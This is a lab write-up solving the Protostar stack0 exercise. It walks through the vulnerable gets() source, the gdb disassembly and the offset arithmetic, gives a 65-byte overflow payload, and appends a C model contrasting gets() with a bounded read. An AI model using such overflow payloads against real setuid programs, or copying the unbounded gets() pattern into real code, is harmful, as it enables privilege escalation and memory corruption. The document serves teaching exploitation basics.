protostar - stack 0

Let's check the file type of our binary using the file command:

$ file stack0
stack0: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, not stripped

This is a 32-bit setuid binary that has not been stripped, so its symbol names are still available to us.

Let's try running the binary:

$ ./stack0
monish
Try again?

Let's look at the source code to understand it properly:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>

int main(int argc, char **argv)
{
  volatile int modified;   /* lives just past the end of buffer on the stack */
  char buffer[64];

  modified = 0;
  gets(buffer);            /* no bounds check: input longer than 64 bytes spills past buffer */

  if(modified != 0) {
      printf("you have changed the 'modified' variable\n");
  } else {
      printf("Try again?\n");
  }
}

So we need to overwrite the modified variable to pass the challenge. gets() does not check the size of its destination, so anything we send beyond 64 bytes is written past buffer.

Let's use gdb to analyse the program.

Disassembling main():

(gdb) disas main
Dump of assembler code for function main:
0x080483f4 <main+0>:	push   ebp
0x080483f5 <main+1>:	mov    ebp,esp
0x080483f7 <main+3>:	and    esp,0xfffffff0
0x080483fa <main+6>:	sub    esp,0x60
0x080483fd <main+9>:	mov    DWORD PTR [esp+0x5c],0x0
0x08048405 <main+17>:	lea    eax,[esp+0x1c]
0x08048409 <main+21>:	mov    DWORD PTR [esp],eax
0x0804840c <main+24>:	call   0x804830c <gets@plt>
0x08048411 <main+29>:	mov    eax,DWORD PTR [esp+0x5c]
0x08048415 <main+33>:	test   eax,eax
0x08048417 <main+35>:	je     0x8048427 <main+51>
0x08048419 <main+37>:	mov    DWORD PTR [esp],0x8048500
0x08048420 <main+44>:	call   0x804832c <puts@plt>
0x08048425 <main+49>:	jmp    0x8048433 <main+63>
0x08048427 <main+51>:	mov    DWORD PTR [esp],0x8048529
0x0804842e <main+58>:	call   0x804832c <puts@plt>
0x08048433 <main+63>:	leave
0x08048434 <main+64>:	ret

Here modified is set to 0:

0x080483fd <main+9>:	mov    DWORD PTR [esp+0x5c],0x0

so modified lives at $esp+0x5c.

Now the address of buffer, which is passed to gets(), is computed by:

0x08048405 <main+17>:	lea    eax,[esp+0x1c]

so buffer starts at $esp+0x1c.

To overwrite modified we need the distance between the two:

>>> print(0x5c-0x1c)
64

So we need to send 64 bytes to fill buffer plus 1 more byte to land in modified. Sending exactly 64 would only place the terminating NUL that gets() appends into modified, leaving it 0.

Let's try it:

$ python -c "print('A'*65)" | ./stack0
you have changed the 'modified' variable
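As an added example that is not part of the original write-up, the following C program models the frame layout derived above (buffer at esp+0x1c, modified at esp+0x5c, frame size 0x60) and compares the unbounded gets() read with a bounded fgets()-style read. The frame array, the offset constants and the helper names are my own construction, not code from the Protostar binary.

```c
#include <stdint.h>
#include <string.h>

/* Constructed model of main()'s 0x60-byte frame taken from the disassembly:
 * buffer is the 64 bytes at esp+0x1c, modified is the int at esp+0x5c. */
#define FRAME_SIZE   0x60
#define BUFFER_OFF   0x1c
#define BUFFER_LEN   64
#define MODIFIED_OFF 0x5c

/* Mimics gets(): copies the whole line plus its NUL with no bound check. */
static void unbounded_read(unsigned char *frame, const char *line)
{
    memcpy(frame + BUFFER_OFF, line, strlen(line) + 1);
}

/* Mimics fgets(buffer, sizeof buffer, stdin): at most 63 bytes plus a NUL. */
static void bounded_read(unsigned char *frame, const char *line)
{
    size_t n = strlen(line);
    if (n > BUFFER_LEN - 1)
        n = BUFFER_LEN - 1;
    memcpy(frame + BUFFER_OFF, line, n);
    frame[BUFFER_OFF + n] = '\0';
}

/* Reads modified back as the 32-bit value stored at esp+0x5c. */
static uint32_t modified_value(const unsigned char *frame)
{
    uint32_t v;
    memcpy(&v, frame + MODIFIED_OFF, sizeof v);
    return v;
}

/* Feeds `count` 'A's (capped so the model stays in bounds) to one read
 * variant on a zeroed frame and returns the resulting value of modified. */
uint32_t run_stack0(int use_bounded_read, size_t count)
{
    unsigned char frame[FRAME_SIZE] = {0};   /* modified starts out as 0 */
    char line[FRAME_SIZE - BUFFER_OFF];      /* room for 67 A's plus NUL */
    if (count > sizeof line - 1)
        count = sizeof line - 1;
    memset(line, 'A', count);
    line[count] = '\0';
    if (use_bounded_read) bounded_read(frame, line);
    else unbounded_read(frame, line);
    return modified_value(frame);
}
```

Calling run_stack0(0, 64), run_stack0(0, 65) and run_stack0(1, 65) from a main() gives 0, a non-zero value (0x41 on little-endian x86) and 0 respectively: 64 bytes only put the NUL into modified, the 65th byte flips it, and the bounded read never reaches it.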

Done! We have completed stack0.